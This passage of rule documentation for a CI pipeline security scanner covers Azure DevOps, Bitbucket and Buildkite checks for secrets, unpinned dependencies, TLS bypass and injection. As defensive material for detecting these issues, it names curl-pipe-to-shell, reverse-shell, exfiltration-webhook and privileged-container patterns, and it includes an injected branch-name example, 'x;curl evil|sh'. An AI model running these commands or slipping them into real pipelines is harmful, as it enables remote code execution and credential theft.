ADO-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Complements ADO-003 (which looks at variables: keys). ADO-008 scans every string in the pipeline against the cross-provider credential-pattern catalog.
Recommendation. Rotate the exposed credential. Move the value to Azure Key Vault or a secret variable group and reference it via $(SECRET_NAME).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed; if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: ADO-008 in the Azure DevOps provider.
ADO-013: Self-hosted pool without explicit ephemeral marker MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. pool: { name: <agent-pool> } (or the bare string form pool: <name>) targets a self-hosted agent pool. Without an explicit ephemeral arrangement, agents reuse state across jobs. Microsoft-hosted pools (vmImage: or the Azure Pipelines / Default names) are skipped.
Recommendation. Configure the agent pool with autoscaling + ephemeral agents (the Azure VM Scale Set agent), and add demands: [ephemeral -equals true] on the pool block so this check can verify it.
Source: ADO-013 in the Azure DevOps provider.
ADO-014: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values in pipeline variables or task inputs can't be rotated on a fine-grained schedule. Prefer OIDC or vault-based credential injection for cross-cloud access.
Recommendation. Use workload identity federation or an Azure Key Vault task to inject short-lived AWS credentials at runtime. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from pipeline variables and task parameters.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-014 in the Azure DevOps provider.
ADO-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build agent.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
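The download-verify-execute pattern as an inline Bash@3 task; the URL and the pinned checksum are placeholders you substitute for the real installer:

```yaml
steps:
  - task: Bash@3
    displayName: Install tool (checksum-verified)
    inputs:
      targetType: inline
      script: |
        curl -fsSLo install.sh https://example.com/install.sh
        # fail the step if the download doesn't match the pinned digest
        echo "<expected-sha256>  install.sh" | sha256sum -c -
        bash install.sh
```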
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit them.
Source: ADO-016 in the Azure DevOps provider.
ADO-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the build agent, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-017 in the Azure DevOps provider.
ADO-020: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
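One way to satisfy the check, sketched with trivy (any of the recognised scanners works); the severity gate shown is a choice, not a requirement:

```yaml
steps:
  - script: trivy fs --exit-code 1 --severity HIGH,CRITICAL .
    displayName: Vulnerability scan (fails on HIGH/CRITICAL)
```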
Source: ADO-020 in the Azure DevOps provider.
ADO-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
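Fixing the trust store instead of bypassing verification might look like this on a Debian/Ubuntu agent; the certificate filename is a placeholder:

```yaml
steps:
  - script: |
      sudo cp internal-ca.crt /usr/local/share/ca-certificates/internal-ca.crt
      sudo update-ca-certificates
    displayName: Trust internal CA (no verification bypass)
```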
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-023 in the Azure DevOps provider.
ADO-024: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. On Azure Pipelines the common pattern is a Bash@3 task invoking cosign attest --yes --predicate=provenance.json $(image). The native Microsoft SBOM tool emits _manifest/spdx_2.2/manifest.spdx.json for SBOM but does not produce provenance on its own.
Recommendation. Add a task that runs cosign attest against a provenance.intoto.jsonl statement, or Microsoft's sbom-tool in attestation mode. ADO-006 covers signing; this rule covers the in-toto statement SLSA Build L3 additionally requires.
Source: ADO-024 in the Azure DevOps provider.
ADO-025: Cross-repo template not pinned to commit SHA HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Azure Pipelines resolves template: build.yml@tools against the tools repo resource's ref: field. When that ref is refs/heads/main (or missing, which defaults to the pipeline's default branch), a push to the callee repo changes what your pipeline runs on the next invocation.
Recommendation. On every resources.repositories entry referenced from a template: ...@repo-alias directive, set ref: refs/tags/<sha> or the bare 40-char commit SHA, never a branch or floating tag. A moved branch/tag swaps the template body without changing your pipeline file.
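A sketch of a pinned repo resource; the repo name and the SHA are placeholders:

```yaml
resources:
  repositories:
    - repository: tools
      type: git
      name: MyProject/tools
      # 40-char commit SHA: immutable, unlike refs/heads/main
      ref: 2f4a9c1d8e7b6a5f4e3d2c1b0a9f8e7d6c5b4a39

steps:
  - template: build.yml@tools
```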
Source: ADO-025 in the Azure DevOps provider.
ADO-026: Pipeline contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. ADO pipelines can run arbitrary shell via bash / script / powershell tasks. This rule scans every string value for known-bad patterns (reverse shells, base64-decoded execution, miner binaries, exfil channels). Orthogonal to ADO-016/ADO-017/ADO-023.
Recommendation. Treat as a potential compromise. Identify the PR/branch that added the matching task(s), rotate any Service Connections the pipeline can reach, and audit Pipeline run logs for outbound traffic to the matched hosts.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
- Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: ADO-026 in the Azure DevOps provider.
ADO-027: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Complements ADO-002 (script injection from untrusted PR context). Fires on intrinsically risky shell idioms (eval, sh -c "$X", backtick exec) regardless of whether the input source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate any value that must feed a dynamic command at the boundary.
Known false positives.
- eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged; the substituted command is literal, and only its output is eval'd.
Source: ADO-027 in the Azure DevOps provider.
BB-001: pipe: action not pinned to exact version HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Bitbucket pipes are docker-image references. Major-only (:1) or missing tags let Atlassian/the publisher swap the image contents. Full semver or sha256 digest is required.
Recommendation. Pin every pipe: to a full semver tag (e.g. atlassian/aws-s3-deploy:1.4.0) or to an immutable SHA. Floating majors like :1 can roll to new code silently.
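The difference in one snippet; the pipe and version numbers are illustrative:

```yaml
pipelines:
  default:
    - step:
        script:
          # exact semver: contents can't change under you
          - pipe: atlassian/aws-s3-deploy:1.4.0
          # floating major (flagged): rolls to new code silently
          # - pipe: atlassian/aws-s3-deploy:1
```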
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-001 in the Bitbucket provider.
BB-002: Script injection via attacker-controllable context HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. $BITBUCKET_BRANCH, $BITBUCKET_TAG, and $BITBUCKET_PR_* are populated from SCM event metadata the attacker controls. Interpolating them unquoted into a shell command lets a crafted branch or tag name execute inline.
Recommendation. Always double-quote interpolations of ref-derived variables ("$BITBUCKET_BRANCH"). Avoid passing them to eval, sh -c, or unquoted command arguments.
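A sketch of the quoting discipline; build.sh is a placeholder:

```yaml
- step:
    script:
      # quoted assignment first, then quoted use: a branch named
      # `x;curl evil|sh` stays an inert string
      - branch="$BITBUCKET_BRANCH"
      - ./build.sh --branch "$branch"
```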
Source: BB-002 in the Bitbucket provider.
BB-003: Variables contain literal secret values CRITICAL
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Scans definitions.variables and each step's variables: for entries whose KEY looks credential-shaped and whose VALUE is a literal string. AWS access keys are detected by value shape regardless of key name.
Recommendation. Store credentials as Repository / Deployment Variables in Bitbucket's Pipelines settings with the 'Secured' flag, and reference them by name. Prefer short-lived OIDC tokens for cloud access.
Source: BB-003 in the Bitbucket provider.
BB-004: Deploy step missing deployment: environment gate MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A step whose name or invoked pipe matches deploy / release / publish / promote should declare a deployment: field so Bitbucket enforces deployment-scoped variables, approvals, and history.
Recommendation. Add deployment: production (or staging / test) to the step. Configure the matching environment in the repo's Deployments settings with required reviewers and secured variables.
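A sketch of a gated deploy step; the environment name must match one configured under the repo's Deployments settings:

```yaml
- step:
    name: Deploy to production
    deployment: production        # binds reviewers + secured variables
    script:
      - ./deploy.sh
```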
Source: BB-004 in the Bitbucket provider.
BB-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Complements BB-003 (variable-name scan). BB-008 checks every string in the pipeline against the cross-provider credential-pattern catalog, catching secrets pasted into script bodies or environment blocks.
Recommendation. Rotate the exposed credential. Move the value to a Secured Repository or Deployment Variable and reference it by name.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed; if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: BB-008 in the Bitbucket provider.
BB-011: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values embedded in the pipeline file can't be rotated on a fine-grained schedule. Prefer OIDC or Bitbucket secured variables for cross-cloud access.
Recommendation. Use Bitbucket OIDC with oidc: true on the AWS pipe, or store credentials as secured Bitbucket variables rather than inline values. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the pipeline file.
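A hedged sketch using OIDC on an Atlassian pipe; the role ARN, bucket, and pipe version are placeholders, and the exact variable names depend on the pipe you use:

```yaml
- step:
    oidc: true                    # Bitbucket issues a short-lived OIDC token
    script:
      - pipe: atlassian/aws-s3-deploy:1.4.0
        variables:
          AWS_OIDC_ROLE_ARN: "arn:aws:iam::123456789012:role/bitbucket-deploy"
          S3_BUCKET: "my-bucket"
          LOCAL_PATH: "build"
```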
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-011 in the Bitbucket provider.
BB-012: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit them.
Source: BB-012 in the Bitbucket provider.
BB-013: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the build runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-013 in the Bitbucket provider.
BB-015: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: BB-015 in the Bitbucket provider.
BB-016: Self-hosted runner without ephemeral marker MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered step writes to a well-known path; a subsequent deploy step on the same runner reads it. Detects runs-on: self.hosted without an ephemeral marker or Docker image override.
Recommendation. Use Docker-based self-hosted runners or configure runners to tear down between jobs. Add 'ephemeral' to runs-on labels or use Bitbucket's runner images that are rebuilt per-job.
Source: BB-016 in the Bitbucket provider.
BB-017: Repository token written to persistent storage CRITICAL 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Detects patterns where Bitbucket pipeline tokens are redirected to files or piped through tee. Persisted tokens survive the step boundary and can be exfiltrated by later steps, artifacts, or cache entries.
Recommendation. Never write BITBUCKET_TOKEN or REPOSITORY_OAUTH_ACCESS_TOKEN to files or artifacts. Use the token inline in the command that needs it and let Bitbucket revoke it after the build.
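Inline use keeps the token off disk; the repo path is a placeholder:

```yaml
- step:
    script:
      # token consumed inline by the one command that needs it;
      # nothing redirected to a file, artifact, or cache
      - git push "https://x-token-auth:${REPOSITORY_OAUTH_ACCESS_TOKEN}@bitbucket.org/myteam/myrepo.git" HEAD:main
```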
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-017 in the Bitbucket provider.
BB-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BB-023 in the Bitbucket provider.
BB-024: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Bitbucket has no native SLSA builder; self-hosted attestation via cosign attest or witness run is the usual path. Pipes like atlassian/cosign-attest (if published) would also match.
Recommendation. Add a step that runs cosign attest against a provenance.intoto.jsonl statement, or integrate the TestifySec witness run attestor. Artifact signing alone (BB-006) doesn't satisfy SLSA Build L3.
Source: BB-024 in the Bitbucket provider.
BB-025: Pipeline contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Specific indicators only (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, credential-dump pipes, audit-erasure commands). Does not replace BB-014 (TLS bypass) or BB-013 (Docker insecure): those are hygiene; this is evidence.
Recommendation. Treat as a potential compromise. Identify the PR that added the matching step(s), rotate any credentials referenced from the pipeline's variable groups, and audit recent builds.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
- Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: BB-025 in the Bitbucket provider.
BB-026: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Complements BB-002 (script injection from untrusted PR context). This rule fires on intrinsically risky idioms (eval, sh -c "$X", backtick exec) regardless of whether the input source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary.
Known false positives.
- eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged; the substituted command is literal, and only its output is eval'd.
Source: BB-026 in the Bitbucket provider.
BK-001: Buildkite plugin not pinned to an exact version HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Buildkite resolves plugin refs at agent boot. foo#v1.2.3 locks the version; foo#main / foo does not. Detection fires on bare names, branch keywords, and partial-semver pins (v4, v4.13).
Recommendation. Pin every plugin reference to an exact tag (docker-compose#v4.13.0) or a 40-char commit SHA. Bare references (docker-compose), branch refs (#main / #master), and major-only floats (#v4) resolve to whatever is current at agent start time, which lets a compromised plugin release execute inside the pipeline.
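The passing and failing forms side by side; the plugin version is illustrative:

```yaml
steps:
  - label: tests
    plugins:
      - docker-compose#v4.13.0:   # exact tag: passes
          run: app
      # - docker-compose#v4:      # major-only float: flagged
      # - docker-compose#main:    # branch ref: flagged
```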
Source: BK-001 in the Buildkite provider.
BK-002: Literal secret value in pipeline env block CRITICAL 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Detection fires on values that look like AWS access keys, GitHub PATs, OpenAI keys, JWTs, or generic high-entropy tokens, plus on env-var names that imply a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) when the value is a non-empty literal rather than an interpolation ($SECRET_FROM_AGENT_HOOK).
Recommendation. Move the value out of the pipeline file. Use Buildkite's agent secrets hooks (secrets/ directory or BUILDKITE_PLUGIN_AWS_SSM_*), the aws-ssm / vault-secrets plugins, or the BUILDKITE_PIPELINE_DEFAULT_BRANCH env var pulled from a secret manager. The pipeline.yml is committed to the repo and visible to anyone with read access.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-002 in the Buildkite provider.
BK-003: Untrusted Buildkite variable interpolated in command HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Buildkite passes branch / tag / message metadata as environment variables. Putting them inside $(...) or shelling out with the value unquoted is a classic command-injection vector. The detection fires on the unquoted interpolation form and on use inside eval / $(...).
Recommendation. Don't interpolate $BUILDKITE_BRANCH, $BUILDKITE_TAG, $BUILDKITE_MESSAGE, $BUILDKITE_PULL_REQUEST_*, or $BUILDKITE_BUILD_AUTHOR* directly into shell commands. These come from the pull request / branch and are attacker-controllable. Quote them and assign to a local variable first (branch="$BUILDKITE_BRANCH"; ./script --branch "$branch"), or pass them as arguments to a script you own.
Source: BK-003 in the Buildkite provider.
BK-004: Remote script piped into shell interpreter HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure, CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. The detection fires on curl|bash, curl|sh, wget|bash, iex (iwr ...), and the corresponding Invoke-WebRequest|Invoke-Expression PowerShell forms. Use curl -fsSLO <url>; sha256sum -c install.sh.sha256; bash install.sh instead.
Recommendation. Download the installer to disk, verify a checksum or signature, then execute it. curl ... | sh lets the remote host change what runs in your pipeline at any time, and any TLS / DNS error during download silently feeds a partial script to the shell.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-004 in the Buildkite provider.
BK-005: Container started with --privileged or host-bind escalation HIGH 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources, CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detection fires on --privileged, --cap-add=SYS_ADMIN, --pid=host / --ipc=host / --userns=host, and explicit mounts of the host Docker socket (/var/run/docker.sock).
Recommendation. Drop --privileged, --cap-add=SYS_ADMIN, --pid=host, and -v /var/run/docker.sock from container invocations. If the workload needs Docker-in-Docker, use a build-specific rootless option (buildx, kaniko, buildah --isolation=chroot) instead of opening the host kernel and the agent's Docker socket to the build script.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-005 in the Buildkite provider.
BK-006: Step has no timeout_in_minutes LOW
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Buildkite has no implicit timeout; agents will wait forever. Set timeout_in_minutes: per step. The pipeline-level default counts: a global steps: block with timeout_in_minutes: is fine, since Buildkite copies it to each step.
Recommendation. Set timeout_in_minutes: on every command step. A compromised dependency or a hung test can otherwise hold an agent indefinitely, blocking parallel pipelines and running up self-hosted-runner cost. Pick a value generous enough for the slowest legitimate run (e.g. 30 for a typical build, 90 for an integration suite).
Known false positives.
- Steps that genuinely need >24h are rare (database migrations, ML training jobs); for those, set timeout_in_minutes: 1440 explicitly so the long ceiling reads as intentional rather than a missing timeout.
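A sketch of explicit per-step timeouts, using the values the recommendation suggests:

```yaml
steps:
  - label: build
    command: make build
    timeout_in_minutes: 30
  - label: integration
    command: make integration
    timeout_in_minutes: 90        # generous ceiling for the slow suite
```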
Source: BK-006 in the Buildkite provider.
BK-007: Deploy step not gated by a manual block / input MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship, release, promote, apply, rollout, terraform apply, kubectl apply, helm upgrade, aws ecs update-service). The check passes when at least one preceding step in the same pipeline file is a block: or input: flow-control step.
Recommendation. Insert a - block: "Deploy?" (or - input: step) in front of every deploy step. Buildkite waits for a human to click Unblock before the gated steps run, which prevents an unreviewed merge from auto-deploying to production. Combine with branches: main so the gate only appears on release branches.
Known false positives.
- Pipelines where the deploy gate lives in a triggered pipeline rather than the local file: the local pipeline looks ungated even though the actual deploy is gated downstream. Add a no-op block: step to silence the finding.
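A sketch combining the manual gate with a branch filter, as the recommendation suggests; commands are placeholders:

```yaml
steps:
  - label: build
    command: make build
  - block: "Deploy?"              # a human must click Unblock
    branches: main                # gate only appears on the release branch
  - label: deploy
    command: ./deploy.sh production
    branches: main
```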
Source: BK-007 in the Buildkite provider.
BK-008: TLS verification disabled in step command MEDIUM 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detection fires on the canonical bypass flags across curl, wget, git, npm, pip, gcloud, and openssl. The check is deliberately conservative: partial-word matches (--insecure-protocols) are excluded.
Recommendation. Drop curl -k / --insecure, wget --no-check-certificate, git -c http.sslVerify=false, and pip install --trusted-host. If a CA isn't trusted, install it into the agent's trust store (update-ca-certificates) rather than disabling validation pipeline-wide. A compromised intermediate that strips TLS gets a free hand with every fetch the step performs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: BK-008 in the Buildkite provider.
BK-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Unsigned artifacts can't be verified downstream; a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools, matching the shared signing-token catalog used by the other CI packs.
Recommendation. Add a signing step: install cosign once (brew install cosign in the agent image, or a cosign-install plugin) and call cosign sign --yes <ref> after the build. For container images pushed to ECR / GCR / GHCR, the same call signs by digest. Publish the signature alongside the artifact and verify it at consumption time.
Source: BK-009 in the Buildkite provider.
BK-010: No SBOM generated for build artifacts MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer "did this CVE ship?" for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool.
Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > sbom.json runs in any standard agent image; cyclonedx-cli and cdxgen are alternative producers. Upload the SBOM via buildkite-agent artifact upload so downstream consumers (and incident-response tooling) can match deployed artifacts to the components they were built from.
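The recommended syft flow as a single step; scanning the checkout directory here, with the output filename a placeholder:

```yaml
steps:
  - label: sbom
    command: |
      syft dir:. -o cyclonedx-json > sbom.json
      buildkite-agent artifact upload sbom.json
```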
Source: BK-010 in the Buildkite provider.
BK-011: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where and how it was built. Without provenance, a leaked signing key alone is enough to forge a trusted artifact; with it, an attacker must also compromise the build environment. You need both for the SLSA Build L3 non-falsifiability guarantee. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance).
Recommendation. Run cosign attest --predicate slsa.json (or the SLSA-framework generator from a build-time step) after the build completes. The predicate records the build inputs and the agent that produced the artifact. Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: BK-011 in the Buildkite provider.
BK-012: No vulnerability scanning step MEDIUM
Evidences: CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers "does this artifact ship a known CVE?" rather than "can we verify what it is?". Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, anchore, dependency-check, checkov, semgrep.
Recommendation. Add a vulnerability scanner: trivy fs . for source / filesystem scans, trivy image <ref> for container images, grype or snyk for either. Add npm audit / pip-audit for language-specific dependency audits. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
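A Buildkite step that fails the build on serious findings might look like this (the severity threshold is a policy choice, not a requirement of the check):

```yaml
steps:
  - label: ":mag: vuln scan"
    command:
      # Non-zero exit on HIGH/CRITICAL findings blocks the merge
      - "trivy fs --exit-code 1 --severity HIGH,CRITICAL ."
```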
Source: BK-012 in the Buildkite provider.
BK-013: Deploy step has no branches: filter MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
